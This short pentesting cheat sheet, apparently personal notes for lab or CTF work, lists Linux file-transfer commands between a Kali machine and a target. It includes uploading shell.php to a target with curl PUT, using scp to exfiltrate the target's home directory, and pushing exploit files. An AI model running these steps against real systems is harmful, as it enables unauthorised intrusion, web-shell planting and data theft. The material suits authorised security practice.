'Nix file transfers

kali $ip 10.10.10.10 | target $ip 10.11.11.11

#Serve the files to transfer from kali , python is a classic (or apache)

python -m SimpleHTTPServer 8000

#wget

wget 10.10.10.10:8000/file.txt

#curl

curl -O http://10.10.10.10/file.txt
curl -X PUT http://10.11.11.11/shell.php -d @shell.php  -v #upload with curl

#SSH / scp

1]Exfil an entire directory from target into kali

sudo scp -r target@10.11.11.11:/home/target .

2]Transfer an exploit to target

sudo scp exploit.py target@10.11.11.11:/home/target

3] From target --> python3 -m http.server 8000 OR python -m SimpleHTTPServer

   From kali --> sudo scp -P 8000 exploit.c target@10.11.11.11:/home/target

Last updated